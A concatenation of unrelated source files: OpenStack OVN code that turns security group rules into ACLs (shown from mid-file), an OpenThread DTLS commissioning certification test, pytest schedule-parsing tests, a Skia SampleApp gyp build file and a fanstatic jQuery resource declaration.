port_match = '%s.type' % icmp
if protocol:
match += ' && %s' % protocol
# If min or max are set to -1, then we just treat it like it wasn't
# specified at all and don't match on it.
min_port = -1 if r['port_range_min'] is None else r['port_range_min']
max_port = -1 if r['port_range_max'] is None else r['port_range_max']
if protocol != icmp:
if (min_port > -1 and min_port == max_port):
match += ' && %s == %d' % (port_match, min_port)
else:
if min_port > -1:
match += ' && %s >= %d' % (port_match, min_port)
if max_port > -1:
match += ' && %s <= %d' % (port_match, max_port)
# It's invalid to create a security group rule for ICMP or ICMPv6 with an
# ICMP(v6) code but without an ICMP(v6) type.
elif protocol == icmp and min_port > -1:
match += ' && %s == %d' % (port_match, min_port)
if max_port > -1:
match += ' && %s.code == %s' % (icmp, max_port)
return match
def drop_all_ip_traffic_for_port(port):
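"""Return default-drop ACLs for all IP traffic to and from the given port."""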
acl_list = []
for direction, p in (('from-lport', 'inport'),
('to-lport', 'outport')):
lswitch = utils.ovn_name(port['network_id'])
lport = port['id']
acl = {"lswitch": lswitch, "lport": lport,
"priority": ovn_const.ACL_PRIORITY_DROP,
"action": ovn_const.ACL_ACTION_DROP,
"log": False,
"direction": direction,
"match": '%s == "%s" && ip' % (p, port['id']),
"external_ids": {'neutron:lport': port['id']}}
acl_list.append(acl)
return acl_list
def add_sg_rule_acl_for_port(port, r, match):
dir_map = {
'ingress': 'to-lport',
'egress': 'from-lport',
}
acl = {"lswitch": utils.ovn_name(port['network_id']),
"lport": port['id'],
"priority": ovn_const.ACL_PRIORITY_ALLOW,
"action": ovn_const.ACL_ACTION_ALLOW_RELATED,
"log": False,
"direction": dir_map[r['direction']],
"match": match,
"external_ids": {'neutron:lport': port['id']}}
return acl
def add_acl_dhcp(port, subnet):
# Allow DHCP responses through from source IPs on the local subnet.
# We do this even if DHCP isn't enabled for the subnet. It could be
# enabled later. We could hook into handling when it's enabled/disabled
# for a subnet, but this is only used when OVN native DHCP is disabled.
acl_list = []
acl = {"lswitch": utils.ovn_name(port['network_id']),
"lport": port['id'],
"priority": ovn_const.ACL_PRIORITY_ALLOW,
"action": ovn_const.ACL_ACTION_ALLOW,
"log": False,
"direction": 'to-lport',
"match": ('outport == "%s" && ip4 && ip4.src == %s && '
'udp && udp.src == 67 && udp.dst == 68'
) % (port['id'], subnet['cidr']),
"external_ids": {'neutron:lport': port['id']}}
acl_list.append(acl)
acl = {"lswitch": utils.ovn_name(port['network_id']),
"lport": port['id'],
"priority": ovn_const.ACL_PRIORITY_ALLOW,
"action": ovn_const.ACL_ACTION_ALLOW,
"log": False,
"direction": 'from-lport',
"match": ('inport == "%s" && ip4 && '
'(ip4.dst == 255.255.255.255 || '
'ip4.dst == %s) && '
'udp && udp.src == 68 && udp.dst == 67'
) % (port['id'], subnet['cidr']),
"external_ids": {'neutron:lport': port['id']}}
acl_list.append(acl)
return acl_list
def _get_subnet_from_cache(plugin, admin_context, subnet_cache, subnet_id):
if subnet_id in subnet_cache:
return subnet_cache[subnet_id]
else:
subnet = plugin.get_subnet(admin_context, subnet_id)
if subnet:
subnet_cache[subnet_id] = subnet
return subnet
def _get_sg_ports_from_cache(plugin, admin_context, sg_ports_cache, sg_id):
if sg_id in sg_ports_cache:
return sg_ports_cache[sg_id]
else:
filters = {'security_group_id': [sg_id]}
sg_ports = plugin._get_port_security_group_bindings(
admin_context, filters)
if sg_ports:
sg_ports_cache[sg_id] = sg_ports
return sg_ports
def _get_sg_from_cache(plugin, admin_context, sg_cache, sg_id):
if sg_id in sg_cache:
return sg_cache[sg_id]
else:
sg = plugin.get_security_group(admin_context, sg_id)
if sg:
sg_cache[sg_id] = sg
return sg
def acl_remote_group_id(r, ip_version):
if not r['remote_group_id']:
return ''
src_or_dst = 'src' if r['direction'] == 'ingress' else 'dst'
addrset_name = utils.ovn_addrset_name(r['remote_group_id'],
ip_version)
return ' && %s.%s == $%s' % (ip_version, src_or_dst, addrset_name)
def _add_sg_rule_acl_for_port(port, r):
# Update the match based on which direction this rule is for (ingress
# or egress).
match = acl_direction(r, port)
# Update the match for IPv4 vs IPv6.
ip_match, ip_version, icmp = acl_ethertype(r)
match += ip_match
# Update the match if an IPv4 or IPv6 prefix was specified.
match += acl_remote_ip_prefix(r, ip_version)
# Update the match if remote group id was specified.
match += acl_remote_group_id(r, ip_version)
# Update the match for the protocol (tcp, udp, icmp) and port/type
# range if specified.
match += acl_protocol_and_ports(r, icmp)
# Finally, create the ACL entry for the direction specified.
return add_sg_rule_acl_for_port(port, r, match)
def update_acls_for_security_group(plugin,
admin_context,
ovn,
security_group_id,
security_group_rule,
sg_ports_cache=None,
is_add_acl=True):
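"""Add or remove the ACLs derived from one security group rule on every port bound to that group."""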
# Skip ACLs if security groups aren't enabled
if not is_sg_enabled():
return
# Get the security group ports.
sg_ports_cache = sg_ports_cache or {}
sg_ports = _get_sg_ports_from_cache(plugin,
admin_context,
sg_ports_cache,
security_group_id)
# ACLs associated with a security group may span logical switches
sg_port_ids = [binding['port_id'] for binding in sg_ports]
sg_port_ids = list(set(sg_port_ids))
port_list = plugin.get_ports(admin_context,
filters={'id': sg_port_ids})
lswitch_names = set([p['network_id'] for p in port_list])
acl_new_values_dict = {}
# NOTE(lizk): We can directly locate the affected acl records,
# so no need to compare new acl values with existing acl objects.
for port in port_list:
acl = _add_sg_rule_acl_for_port(port, security_group_rule)
if acl:
# Remove lport and lswitch since we don't need them
acl.pop('lport')
acl.pop('lswitch')
acl_new_values_dict[port['id']] = acl
ovn.update_acls(list(lswitch_names),
iter(port_list),
acl_new_values_dict,
need_compare=False,
is_add_acl=is_add_acl).execute(check_error=True)
def add_acls(plugin, admin_context, port, sg_cache, subnet_cache):
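"""Build the full ACL list for a port: default IP drops, DHCP allows (when OVN native DHCP is off) and one ACL per security group rule."""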
acl_list = []
# Skip ACLs if security groups aren't enabled
if not is_sg_enabled():
return acl_list
sec_groups = port.get('security_groups', [])
if not sec_groups:
return acl_list
# Drop all IP traffic to and from the logical port by default.
acl_list += drop_all_ip_traffic_for_port(port)
# Add DHCP ACLs if not using OVN native DHCP.
if not config.is_ovn_dhcp():
port_subnet_ids = set()
for ip in port['fixed_ips']:
if netaddr.IPNetwork(ip['ip_address']).version != 4:
continue
subnet = _get_subnet_from_cache(plugin,
admin_context,
subnet_cache,
ip['subnet_id'])
# Ignore duplicate DHCP ACLs for the subnet.
if subnet['id'] not in port_subnet_ids:
acl_list += add_acl_dhcp(port, subnet)
port_subnet_ids.add(subnet['id'])
# We create an ACL entry for each rule on each security group applied
# to this port.
for sg_id in sec_groups:
sg = _get_sg_from_cache(plugin,
admin_context,
sg_cache,
sg_id)
for r in sg['security_group_rules']:
acl = _add_sg_rule_acl_for_port(port, r)
if acl and acl not in acl_list:
acl_list.append(acl)
return acl_list
def acl_port_ips(port):
# Skip ACLs if security groups aren't enabled
if not is_sg_enabled():
return {'ip4': [], 'ip6': []}
ip_addresses = {4: [], 6: []}
for fixed_ip in port['fixed_ips']:
ip_version = netaddr.IPNetwork(fixed_ip['ip_address']).version
ip_addresses[ip_version].append(fixed_ip['ip_address'])
return {'ip4': ip_addresses[4],
'ip6': ip_addresses[6]}
|
py | b4104dae1b614c9b26bed467bc5c75a3fa4ec488 | #!/usr/bin/env python3
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import unittest
import command
import config
import dtls
import thread_cert
from pktverify.consts import MLE_DISCOVERY_REQUEST, MLE_DISCOVERY_RESPONSE, HANDSHAKE_CLIENT_HELLO, HANDSHAKE_SERVER_HELLO, HANDSHAKE_SERVER_KEY_EXCHANGE, HANDSHAKE_SERVER_HELLO_DONE, HANDSHAKE_CLIENT_KEY_EXCHANGE, HANDSHAKE_HELLO_VERIFY_REQUEST, CONTENT_APPLICATION_DATA, NM_EXTENDED_PAN_ID_TLV, NM_NETWORK_NAME_TLV, NM_STEERING_DATA_TLV, NM_COMMISSIONER_UDP_PORT_TLV, NM_JOINER_UDP_PORT_TLV, NM_DISCOVERY_REQUEST_TLV, NM_DISCOVERY_RESPONSE_TLV, THREAD_DISCOVERY_TLV, CONTENT_CHANGE_CIPHER_SPEC, CONTENT_HANDSHAKE, CONTENT_ALERT
from pktverify.packet_verifier import PacketVerifier
COMMISSIONER = 1
JOINER = 2
# Test Purpose and Description:
# -----------------------------
# The purpose of this test case is to verify the DTLS sessions between the
# on-mesh Commissioner and a Joiner when the correct PSKd is used
#
# Note that many of the messages/records exchanged are encrypted
# and cannot be observed
#
# Test Topology:
# -------------
# Commissioner
# |
# Joiner
#
# DUT Types:
# ----------
# Commissioner
# Joiner
class Cert_8_1_01_Commissioning(thread_cert.TestCase):
SUPPORT_NCP = False
TOPOLOGY = {
COMMISSIONER: {
'name': 'COMMISSIONER',
'networkkey': '00112233445566778899aabbccddeeff',
'mode': 'rdn',
},
JOINER: {
'name': 'JOINER',
'networkkey': 'deadbeefdeadbeefdeadbeefdeadbeef',
'mode': 'rdn',
},
}
def test(self):
self.nodes[COMMISSIONER].interface_up()
self.nodes[COMMISSIONER].thread_start()
self.simulator.go(5)
self.assertEqual(self.nodes[COMMISSIONER].get_state(), 'leader')
self.nodes[COMMISSIONER].commissioner_start()
self.simulator.go(3)
self.nodes[COMMISSIONER].commissioner_add_joiner(self.nodes[JOINER].get_eui64(), 'PSKD01')
self.nodes[JOINER].interface_up()
self.nodes[JOINER].joiner_start('PSKD01')
self.simulator.go(10)
self.simulator.read_cert_messages_in_commissioning_log([COMMISSIONER, JOINER])
self.assertEqual(
self.nodes[JOINER].get_networkkey(),
self.nodes[COMMISSIONER].get_networkkey(),
)
joiner_messages = self.simulator.get_messages_sent_by(JOINER)
commissioner_messages = self.simulator.get_messages_sent_by(COMMISSIONER)
# 5.8,9,10,11
# - Joiner
command.check_joiner_commissioning_messages(joiner_messages.commissioning_messages)
# - Commissioner
command.check_commissioner_commissioning_messages(commissioner_messages.commissioning_messages)
# As commissioner is also joiner router
command.check_joiner_router_commissioning_messages(commissioner_messages.commissioning_messages)
self.nodes[JOINER].thread_start()
self.simulator.go(5)
self.assertEqual(self.nodes[JOINER].get_state(), 'router')
def verify(self, pv):
pkts = pv.pkts
pv.summary.show()
COMMISSIONER = pv.vars['COMMISSIONER']
COMMISSIONER_VERSION = pv.vars['COMMISSIONER_VERSION']
JOINER_VERSION = pv.vars['JOINER_VERSION']
# Step 3: Joiner sends MLE Discovery Request
# MLE Discovery Request message MUST have these values:
# - MLE Security Suite: 255 (No MLE Security)
# - Thread Discovery TLV
# Sub-TLVs:
# - Discovery Request TLV
# - Protocol Version: 2 or 3
# (depends on the Thread stack version in testing)
pkts.filter_mle_cmd(MLE_DISCOVERY_REQUEST).\
filter_LLARMA().\
filter(lambda p:
[THREAD_DISCOVERY_TLV] == p.mle.tlv.type and\
[NM_DISCOVERY_REQUEST_TLV] == p.thread_meshcop.tlv.type and\
p.thread_meshcop.tlv.discovery_req_ver == JOINER_VERSION
).\
must_next()
# Step 4: Commissioner sends MLE Discovery Response
# MLE Discovery Response message MUST have these values:
# - MLE Security Suite: 255 (No MLE Security)
# - Source Address in IEEE 802.15.4 header MUST be set to
# the MAC Extended Address (64-bit)
# - Destination Address in IEEE 802.15.4 header MUST be
# set to Discovery Request Source Address
# - Thread Discovery TLV
# Sub-TLVs:
# - Discovery Response TLV
# - Protocol Version: 2 or 3
# (depends on the Thread stack version in testing)
# - Extended PAN ID TLV
# - Joiner UDP Port TLV
# - Network Name TLV
# - Steering Data TLV
# - Commissioner UDP Port TLV (optional)
_rs_pkt = pkts.filter_wpan_src64(COMMISSIONER).\
filter_mle_cmd(MLE_DISCOVERY_RESPONSE).\
filter(lambda p: {
NM_EXTENDED_PAN_ID_TLV,
NM_NETWORK_NAME_TLV,
NM_STEERING_DATA_TLV,
NM_JOINER_UDP_PORT_TLV,
NM_DISCOVERY_RESPONSE_TLV
} <= set(p.thread_meshcop.tlv.type) and\
p.thread_meshcop.tlv.discovery_rsp_ver == COMMISSIONER_VERSION
).\
must_next()
# Step 5: Verify the following details occur in the exchange between
# Joiner and the Commissioner
# 1. UDP port (Specified by the Commissioner: in Discovery Response)
# is used as destination port for UDP datagrams from Joiner to
# the Commissioner.
# 2. Joiner sends an initial DTLS-ClientHello handshake record to the
# Commissioner
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
p.dtls.handshake.type == [HANDSHAKE_CLIENT_HELLO] and\
p.udp.srcport in _rs_pkt.thread_meshcop.tlv.udp_port and\
p.udp.dstport in _rs_pkt.thread_meshcop.tlv.udp_port
).\
must_next()
# 3. The Commissioner receives the initial DTLS-ClientHello handshake
# record and sends a DTLS-HelloVerifyRequest handshake record to Joiner
_pkt = pkts.filter_wpan_src64(COMMISSIONER).\
filter(lambda p: p.dtls.handshake.type == [HANDSHAKE_HELLO_VERIFY_REQUEST]).\
must_next()
_pkt.must_verify(lambda p: p.dtls.handshake.cookie is not None)
# 4. Joiner receives the DTLS-HelloVerifyRequest handshake record and sends
# a subsequent DTLS-ClientHello handshake record in one UDP datagram to the
# Commissioner
# Verify that both DTLS-HelloVerifyRequest and subsequent DTLS-ClientHello
# contain the same cookie
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
p.dtls.handshake.type == [HANDSHAKE_CLIENT_HELLO] and\
p.dtls.handshake.cookie == _pkt.dtls.handshake.cookie
).\
must_next()
# 5. Commissioner must correctly receive the subsequent DTLSClientHello
# handshake record and then send, in order, DTLSServerHello,
# DTLS-ServerKeyExchange and DTLSServerHelloDone handshake records to Joiner
pkts.filter_wpan_src64(COMMISSIONER).\
filter(lambda p:
p.dtls.handshake.type == [HANDSHAKE_SERVER_HELLO,
HANDSHAKE_SERVER_KEY_EXCHANGE,
HANDSHAKE_SERVER_HELLO_DONE]
).\
must_next()
# 6. Joiner receives the DTLS-ServerHello, DTLSServerKeyExchange and
# DTLS-ServerHelloDone handshake records and sends, in order,
# a DTLS-ClientKeyExchange handshake record,
# a DTLS-ChangeCipherSpec record and
# an encrypted DTLS-Finished handshake record to the Commissioner.
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
p.dtls.handshake.type == [HANDSHAKE_CLIENT_KEY_EXCHANGE] and\
{
CONTENT_CHANGE_CIPHER_SPEC,
CONTENT_HANDSHAKE
} == set(p.dtls.record.content_type)
).\
must_next()
# 7. Commissioner receives the DTLS-ClientKeyExchange handshake record, the
# DTLS-ChangeCipherSpec record and the encrypted DTLS-Finished handshake record,
# and sends a DTLS-ChangeCipherSpec record and an encrypted DTLSFinished handshake
# record in that order to Joiner
pkts.filter_wpan_src64(COMMISSIONER).\
filter(lambda p: {
CONTENT_CHANGE_CIPHER_SPEC,
CONTENT_HANDSHAKE
} == set(p.dtls.record.content_type)
).\
must_next()
# 8. Joiner receives the DTLS-ChangeCipherSpec record and the encrypted DTLS-Finished
# handshake record and sends a JOIN_FIN.req message in an encrypted DTLS-ApplicationData
# record in a single UDP datagram to Commissioner.
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
[CONTENT_APPLICATION_DATA] == p.dtls.record.content_type
).\
must_next()
# 9. Commissioner receives the encrypted DTLS-ApplicationData record and sends a
# JOIN_FIN.rsp message in an encrypted DTLS-ApplicationData record in a single
# UDP datagram to Joiner
pkts.filter_wpan_src64(COMMISSIONER).\
filter(lambda p:
[CONTENT_APPLICATION_DATA] == p.dtls.record.content_type
).\
must_next()
# 10. Commissioner sends an encrypted JOIN_ENT.ntf message to Joiner
# 11. Joiner receives the encrypted JOIN_ENT.ntf message and sends an encrypted
# JOIN_ENT.ntf dummy response to Commissioner
# Check Step 8 ~ 11 in test()
# 12. Joiner sends an encrypted DTLS-Alert record with a code of 0 (close_notify)
# to Commissioner
pkts.filter_wpan_dst64(COMMISSIONER).\
filter(lambda p:
[CONTENT_ALERT] == p.dtls.record.content_type
).\
must_next()
if __name__ == '__main__':
unittest.main()
|
py | b4104e77d9dae2195988b5ad86faa0e33d2a5382 | from app.models.energy.scheduleruleset import ScheduleRulesetAbridged
from app.models.energy.schedulefixedinterval import ScheduleFixedIntervalAbridged
import os
# target folder where all of the samples live
root = os.path.dirname(os.path.dirname(__file__))
target_folder = os.path.join(root, 'app', 'models', 'samples')
def test_ruleset_office_occupancy():
file_path = os.path.join(
target_folder, 'schedule_ruleset_office_occupancy.json')
ScheduleRulesetAbridged.parse_file(file_path)
def test_primary_school_occupancy():
file_path = os.path.join(
target_folder, 'schedule_primary_school_occupancy.json')
ScheduleRulesetAbridged.parse_file(file_path)
def test_ruleset_simple_repeating():
file_path = os.path.join(
target_folder, 'schedule_ruleset_simple_repeating.json')
ScheduleRulesetAbridged.parse_file(file_path)
def test_fixedinterval_increasing_fine_timestep():
file_path = os.path.join(
target_folder, 'schedule_fixedinterval_increasing_fine_timestep.json')
ScheduleFixedIntervalAbridged.parse_file(file_path)
def test_fixedinterval_increasing_single_day():
file_path = os.path.join(
target_folder, 'schedule_fixedinterval_increasing_single_day.json')
ScheduleFixedIntervalAbridged.parse_file(file_path)
def test_fixedinterval_random_annual():
file_path = os.path.join(
target_folder, 'schedule_fixedinterval_random_annual.json')
ScheduleFixedIntervalAbridged.parse_file(file_path)
|
gyp | b4104ed2e26d553d4821a5cca7939c2eed123e79 | {
'targets': [
{
'target_name': 'SampleApp',
'type': 'executable',
'mac_bundle' : 1,
'include_dirs' : [
'../src/core',
'../src/effects', #needed for BlurMask.h
'../gm', # needed to pull gm.h
'../samplecode', # To pull SampleApp.h and SampleCode.h
'../src/pipe/utils', # For TiledPipeController
],
'includes': [
'gmslides.gypi',
],
'sources': [
'../gm/gm.cpp',
'../gm/gm.h',
'../samplecode/GMSampleView.h',
'../samplecode/ClockFaceView.cpp',
'../samplecode/OverView.cpp',
'../samplecode/OverView.h',
'../samplecode/Sample2PtRadial.cpp',
'../samplecode/SampleAAClip.cpp',
'../samplecode/SampleAARects.cpp',
'../samplecode/SampleAARectModes.cpp',
'../samplecode/SampleAll.cpp',
'../samplecode/SampleAnimator.cpp',
'../samplecode/SampleAnimBlur.cpp',
'../samplecode/SampleApp.cpp',
'../samplecode/SampleArc.cpp',
'../samplecode/SampleAvoid.cpp',
'../samplecode/SampleBigBlur.cpp',
'../samplecode/SampleBigGradient.cpp',
'../samplecode/SampleBitmapRect.cpp',
'../samplecode/SampleBlur.cpp',
'../samplecode/SampleCamera.cpp',
'../samplecode/SampleChart.cpp',
'../samplecode/SampleCircle.cpp',
'../samplecode/SampleClip.cpp',
'../samplecode/SampleCode.h',
'../samplecode/SampleColorFilter.cpp',
'../samplecode/SampleComplexClip.cpp',
'../samplecode/SampleConcavePaths.cpp',
'../samplecode/SampleCull.cpp',
'../samplecode/SampleDecode.cpp',
'../samplecode/SampleDegenerateTwoPtRadials.cpp',
'../samplecode/SampleDither.cpp',
'../samplecode/SampleDitherBitmap.cpp',
'../samplecode/SampleEffects.cpp',
'../samplecode/SampleEmboss.cpp',
'../samplecode/SampleEmptyPath.cpp',
'../samplecode/SampleEncode.cpp',
'../samplecode/SampleFatBits.cpp',
'../samplecode/SampleFillType.cpp',
'../samplecode/SampleFilter.cpp',
'../samplecode/SampleFilter2.cpp',
'../samplecode/SampleFontCache.cpp',
'../samplecode/SampleFontScalerTest.cpp',
'../samplecode/SampleFuzz.cpp',
'../samplecode/SampleGradients.cpp',
'../samplecode/SampleHairCurves.cpp',
'../samplecode/SampleHairline.cpp',
'../samplecode/SampleHairModes.cpp',
'../samplecode/SampleLayerMask.cpp',
'../samplecode/SampleLayers.cpp',
'../samplecode/SampleLCD.cpp',
'../samplecode/SampleLines.cpp',
'../samplecode/SampleManyRects.cpp',
'../samplecode/SampleMeasure.cpp',
'../samplecode/SampleMipMap.cpp',
'../samplecode/SampleMovie.cpp',
'../samplecode/SampleOvalTest.cpp',
'../samplecode/SampleOverflow.cpp',
'../samplecode/SamplePatch.cpp',
'../samplecode/SamplePath.cpp',
'../samplecode/SamplePathClip.cpp',
'../samplecode/SamplePathEffects.cpp',
'../samplecode/SamplePicture.cpp',
'../samplecode/SamplePictFile.cpp',
'../samplecode/SamplePoints.cpp',
'../samplecode/SamplePolyToPoly.cpp',
'../samplecode/SampleRegion.cpp',
'../samplecode/SampleRepeatTile.cpp',
'../samplecode/SampleRotateCircles.cpp',
'../samplecode/SampleShaders.cpp',
'../samplecode/SampleShaderText.cpp',
'../samplecode/SampleSkLayer.cpp',
'../samplecode/SampleSlides.cpp',
'../samplecode/SampleStrokePath.cpp',
'../samplecode/SampleStrokeText.cpp',
'../samplecode/SampleTests.cpp',
'../samplecode/SampleText.cpp',
'../samplecode/SampleTextAlpha.cpp',
'../samplecode/SampleTextBox.cpp',
'../samplecode/SampleTextOnPath.cpp',
'../samplecode/SampleTextureDomain.cpp',
'../samplecode/SampleTiling.cpp',
'../samplecode/SampleTinyBitmap.cpp',
'../samplecode/SampleUnitMapper.cpp',
'../samplecode/SampleVertices.cpp',
'../samplecode/SampleXfermodesBlur.cpp',
'../samplecode/TransitionView.cpp',
'../samplecode/TransitionView.h',
# DrawingBoard
#'../experimental/DrawingBoard/SkColorPalette.h',
#'../experimental/DrawingBoard/SkColorPalette.cpp',
#'../experimental/DrawingBoard/SkNetPipeController.h',
#'../experimental/DrawingBoard/SkNetPipeController.cpp',
#'../experimental/DrawingBoard/SampleDrawingClient.cpp',
#'../experimental/DrawingBoard/SampleDrawingServer.cpp',
# Networking
#'../experimental/Networking/SampleNetPipeReader.cpp',
#'../experimental/Networking/SkSockets.cpp',
#'../experimental/Networking/SkSockets.h',
# TiledPipeController
'../src/pipe/utils/SamplePipeControllers.h',
'../src/pipe/utils/SamplePipeControllers.cpp',
],
'sources!': [
'../samplecode/SampleSkLayer.cpp', #relies on SkMatrix44 which doesn't compile
'../samplecode/SampleTests.cpp', #includes unknown file SkShaderExtras.h
'../samplecode/SampleWarp.cpp',
'../samplecode/SampleFontCache.cpp',
],
'dependencies': [
'skia_base_libs.gyp:skia_base_libs',
'effects.gyp:effects',
'images.gyp:images',
'views.gyp:views',
'animator.gyp:animator',
'xml.gyp:xml',
'experimental.gyp:experimental',
'pdf.gyp:pdf',
'views_animated.gyp:views_animated',
],
'conditions' : [
[ 'skia_os in ["linux", "freebsd", "openbsd", "solaris"]', {
'sources!': [
'../samplecode/SampleDecode.cpp',
],
}],
[ 'skia_os == "win"', {
'sources!': [
# require UNIX functions
'../samplecode/SampleEncode.cpp',
],
}],
[ 'skia_os == "mac"', {
'sources!': [
'../samplecode/SampleDecode.cpp',
],
'sources': [
# Sample App specific files
'../src/views/mac/SampleApp-Info.plist',
'../src/views/mac/SampleAppDelegate.h',
'../src/views/mac/SampleAppDelegate.mm',
'../src/views/mac/SkSampleNSView.h',
'../src/views/mac/SkSampleNSView.mm',
# Mac files
'../src/views/mac/SkEventNotifier.h',
'../src/views/mac/SkEventNotifier.mm',
'../src/views/mac/skia_mac.mm',
'../src/views/mac/SkNSView.h',
'../src/views/mac/SkNSView.mm',
'../src/views/mac/SkOptionsTableView.h',
'../src/views/mac/SkOptionsTableView.mm',
'../src/views/mac/SkOSWindow_Mac.mm',
'../src/views/mac/SkTextFieldCell.h',
'../src/views/mac/SkTextFieldCell.m',
],
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
'$(SDKROOT)/System/Library/Frameworks/OpenGL.framework',
],
'xcode_settings' : {
'INFOPLIST_FILE' : '../src/views/mac/SampleApp-Info.plist',
},
'mac_bundle_resources' : [
'../src/views/mac/SampleApp.xib',
],
}],
[ 'skia_os == "ios"', {
# TODO: This doesn't build properly yet, but it's getting there.
'sources!': [
'../samplecode/SampleDecode.cpp',
],
'sources': [
'../src/views/mac/SkEventNotifier.h',
'../src/views/mac/SkEventNotifier.mm',
'../experimental/iOSSampleApp/SkSampleUIView.h',
'../experimental/iOSSampleApp/SkSampleUIView.mm',
'../experimental/iOSSampleApp/SkiOSSampleApp-Base.xcconfig',
'../experimental/iOSSampleApp/SkiOSSampleApp-Debug.xcconfig',
'../experimental/iOSSampleApp/SkiOSSampleApp-Release.xcconfig',
'../experimental/iOSSampleApp/iOSSampleApp-Info.plist',
'../experimental/iOSSampleApp/Shared/SkOptionListController.h',
'../experimental/iOSSampleApp/Shared/SkOptionListController.mm',
'../experimental/iOSSampleApp/Shared/SkUIRootViewController.h',
'../experimental/iOSSampleApp/Shared/SkUIRootViewController.mm',
'../experimental/iOSSampleApp/Shared/SkOptionsTableViewController.h',
'../experimental/iOSSampleApp/Shared/SkOptionsTableViewController.mm',
'../experimental/iOSSampleApp/Shared/SkUIView.h',
'../experimental/iOSSampleApp/Shared/SkUIView.mm',
'../experimental/iOSSampleApp/Shared/SkUIDetailViewController.h',
'../experimental/iOSSampleApp/Shared/SkUIDetailViewController.mm',
'../experimental/iOSSampleApp/Shared/skia_ios.mm',
# iPad
'../experimental/iOSSampleApp/iPad/AppDelegate_iPad.h',
'../experimental/iOSSampleApp/iPad/AppDelegate_iPad.mm',
'../experimental/iOSSampleApp/iPad/SkUISplitViewController.h',
'../experimental/iOSSampleApp/iPad/SkUISplitViewController.mm',
'../experimental/iOSSampleApp/iPad/MainWindow_iPad.xib',
# iPhone
'../experimental/iOSSampleApp/iPhone/AppDelegate_iPhone.h',
'../experimental/iOSSampleApp/iPhone/AppDelegate_iPhone.mm',
'../experimental/iOSSampleApp/iPhone/SkUINavigationController.h',
'../experimental/iOSSampleApp/iPhone/SkUINavigationController.mm',
'../experimental/iOSSampleApp/iPhone/MainWindow_iPhone.xib',
'../src/views/ios/SkOSWindow_iOS.mm',
'../src/utils/ios/SkImageDecoder_iOS.mm',
'../src/utils/ios/SkStream_NSData.mm',
'../src/utils/ios/SkOSFile_iOS.mm',
'../include/utils/mac/SkCGUtils.h',
'../src/utils/mac/SkCreateCGImageRef.cpp',
'../experimental/iOSSampleApp/SkiOSSampleApp-Debug.xcconfig',
'../experimental/iOSSampleApp/SkiOSSampleApp-Release.xcconfig',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreGraphics.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreText.framework',
'$(SDKROOT)/System/Library/Frameworks/UIKit.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
'$(SDKROOT)/System/Library/Frameworks/OpenGLES.framework',
'$(SDKROOT)/System/Library/Frameworks/ImageIO.framework',
'$(SDKROOT)/System/Library/Frameworks/MobileCoreServices.framework',
],
},
'include_dirs' : [
'../experimental/iOSSampleApp',
'../experimental/iOSSampleApp/iPad',
'../experimental/iOSSampleApp/iPhone',
'../include/utils/ios',
],
'xcode_settings' : {
'INFOPLIST_FILE' : '../experimental/iOSSampleApp/iOSSampleApp-Info.plist',
},
'xcode_config_file': '../experimental/iOSSampleApp/SkiOSSampleApp-Base.xcconfig',
'mac_bundle_resources' : [
'../experimental/iOSSampleApp/iPad/MainWindow_iPad.xib',
'../experimental/iOSSampleApp/iPhone/MainWindow_iPhone.xib',
],
}],
[ 'skia_os == "android"', {
'sources!': [
'../samplecode/SampleAnimator.cpp',
'../samplecode/SampleUnitMapper.cpp',
],
'dependencies!': [
'animator.gyp:animator',
'experimental.gyp:experimental',
],
'dependencies': [
'android_deps.gyp:Android_SampleApp',
],
}],
[ 'skia_gpu == 1', {
'include_dirs': [
'../src/gpu', # To pull gl/GrGLUtil.h
],
}],
[ 'skia_os == "nacl"', {
'sources': [
'../../nacl/src/nacl_sample.cpp',
],
}],
],
'msvs_settings': {
'VCLinkerTool': {
'SubSystem': '2',
},
},
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
|
py | b4104f9018afc70dfea6218deb04e0c71e7acc27 | from fanstatic import Library, Resource
from js.jquery import jquery
library = Library('jquery_notify', 'resources')
jquery_notify = Resource(library, 'jquery.notify.js', minified='jquery.notify.min.js', depends=[jquery,]) |
